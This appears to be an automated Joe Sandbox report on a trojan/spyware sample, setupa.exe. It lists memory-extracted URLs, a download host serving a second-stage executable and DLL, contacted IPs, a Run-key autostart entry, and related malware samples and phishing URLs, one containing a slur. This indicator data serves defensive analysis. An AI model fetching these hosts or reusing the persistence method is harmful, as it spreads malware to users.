| https://kehu8.oss-cn-hongkong.aliyuncs.com/ClassicStartMenuDLL.dll | false | | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://schemas.xmlsoap.org/ws/2004/09/policy1p | svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2004/09/policy=80600 | svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://kehu8.oss-cn-hongkong.aliyuncs.com/upup.oxT | setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf | svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA | svchost.exe, 00000008.00000003.2271420888.000002D754529000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/DeviceQuery.srf | svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/soap/envelope/ | svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://kehu8.oss-cn-hongkong.aliyuncs.com/upup.oxM | setupa.exe, 00000000.00000003.2137313739.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2158570611.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdfo | svchost.exe, 00000008.00000003.2331530275.000002D754574000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://login.microsoftonline.com/ppsecure/ResolveUser.srf | svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://Passport.NET/tbA | svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/MSARST2.srf | svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utili0728275966HRDQJD | svchost.exe, 00000008.00000002.3350658881.000002D754579000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://Passport.NET/STS | svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350136674.000002D754513000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2316259625.000002D75457F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/wss/2 | svchost.exe, 00000008.00000003.2316259625.000002D754574000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/DeviceQuery.srf- | svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3346551021.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090512715.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf% | svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/02/scdom | svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://3csp.icrosof4m/ocp0 | lsass.exe, 00000001.00000002.3350014220.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds | svchost.exe, 00000008.00000003.2342560646.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2362504881.000002D75457A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/devicechangecredential.srf | svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf. | svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf | svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://Passport.NET/tb | svchost.exe, 00000008.00000002.3346593256.000002D753E7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350920486.000002D75457F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000001.00000002.3346551021.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090512715.00000140AD850000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252612816.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2272320979.000002D754510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252517534.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3349971930.000002D754500000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://account.live.com/InlineSignup.aspx?iww=1&id=80502 | svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd | svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://signup.live.com/signup.aspx | svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://Passport.NET/tb_ | svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.live | svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601 | svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600 | svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603 | svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdfo | svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://kehu8.oss-cn-hongkong.aliyuncs.com/ | setupa.exe, 00000000.00000003.2117823175.000001F5DCC0C000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2158472042.000001F5DCC0C000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2137176745.000001F5DCC0C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://kehu8.oss-cn-hongkong.aliyuncs.com/# | setupa.exe, 00000000.00000003.2137313739.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605 | svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ | svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604 | svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://account.live.com/msangcwam | svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199640134.000002D754557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmp | false | | |
                                                        unknown
                                                        http://www.w3.orsvchost.exe, 00000008.00000003.2316259625.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://crl.ver)svchost.exe, 00000008.00000002.3348244944.000002D753EDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3363402606.000001428B127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 00000008.00000003.2271420888.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://passport.net/tbsvchost.exe, 00000008.00000002.3348421025.000002D753EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://upx.sf.netAmcache.hve.7.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 00000008.00000003.2342560646.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/09/policyAAAAsvchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000008.00000002.3346593256.000002D753E7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exe:setupa.exe, 00000000.00000003.2158570611.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAsvchost.exe, 00000008.00000003.2271420888.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.3347561390.000002D753EB9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://Passport.NET/tb:ppsvchost.exe, 00000008.00000002.3352993743.000002D754CB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3347254806.000002D753EA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 00000008.00000003.2316259625.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331530275.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuessuesvchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://login.ecursvchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://kehu8.oss-cn-hongkong.aliyuncs.com/Ssetupa.exe, 00000000.00000003.2137313739.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2158570611.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://account.live.com/Wizard/Password/Change?id=806015svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exeRsetupa.exe, 00000000.00000003.2158570611.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331530275.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252612816.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2272320979.000002D754510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252517534.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3349971930.000002D754500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3352204209.000002D754C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
47.239.116.158 | unknown | United States | 20115 | CHARTER-20115US | true
47.79.64.157 | kehu8.oss-cn-hongkong.aliyuncs.com | United States | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1527612
Start date and time: 2024-10-07 06:38:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: setupa.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@12/41@1/2
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 92%
                                                                                                            • Number of executed functions: 117
                                                                                                            • Number of non-executed functions: 278
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                            • Exclude process from analysis (whitelisted): WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.190.159.23, 40.126.31.73, 40.126.31.69, 20.190.159.4, 40.126.31.71, 40.126.31.67, 20.190.159.71, 20.190.159.75, 93.184.221.240, 192.229.221.95, 20.42.65.92, 52.182.143.212
                                                                                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:39:00 | API Interceptor | 4x Sleep call for process: setupa.exe modified
00:39:00 | API Interceptor | 1x Sleep call for process: dllhost.exe modified
00:39:08 | API Interceptor | 4x Sleep call for process: upupoo-classicshell.exe modified
00:39:14 | API Interceptor | 673840x Sleep call for process: svchost.exe modified
00:39:25 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
00:40:18 | API Interceptor | 195x Sleep call for process: lsass.exe modified
06:39:08 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WINWORD2013 C:\Users\Public\Documents\upupoo-classicshell.exe
                                                                                                            No context
Match: fp2e7a.wpc.phicdn.net
Associated Sample Name / URL | Detection | Threat Name | Context
cea5c9ffbf7c8ae9cf3f22399151956f3ee7145b95978.exe | malicious | Unknown | 192.229.221.95
MPil9jkBPG.exe | malicious | Vidar | 192.229.221.95
fe6yqly1Xh.exe | malicious | Stealc, Vidar | 192.229.221.95
http://ser0xen.com/sucklemydicknigger.exe | malicious | XWorm | 192.229.221.95
file.exe | malicious | Vidar | 192.229.221.95
file.exe | malicious | Vidar | 192.229.221.95
file.exe | malicious | Stealc | 192.229.221.95
CR0QGWXdDl.exe | malicious | Stealc, Vidar | 192.229.221.95
https://maxask.com | malicious | Unknown | 192.229.221.95
SecuriteInfo.com.Trojan.DownLoader47.42925.26493.18247.exe | malicious | Amadey | 192.229.221.95
Match: VODAFONE-TRANSIT-ASVodafoneNZLtdNZ
Associated Sample Name / URL | Detection | Threat Name | Context
na.elf | malicious | Mirai | 210.246.40.191
arm-20241006-0950.elf | malicious | Mirai | 118.95.51.137
setup.ic19.exe | malicious | GhostRat, Nitol | 47.76.31.57
https://whtasapp-ky.com/ | malicious | Unknown | 47.76.254.147
file.exe | malicious | GhostRat, Mimikatz | 47.76.175.95
https://whsotsapp.com/ | malicious | Unknown | 47.76.254.147
https://alie.kr/8IuPro4 | malicious | Unknown | 104.84.57.202
https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/zoe-elefterin.com/M%2f13303%2FcXJzYy1xdWFsaXR5cmVwb3J0aW5nc2VydmljZWNlbnRlcmdyb3VwbWFpbGJveEBycmIuZ292 | malicious | HTMLPhisher | 104.84.56.104
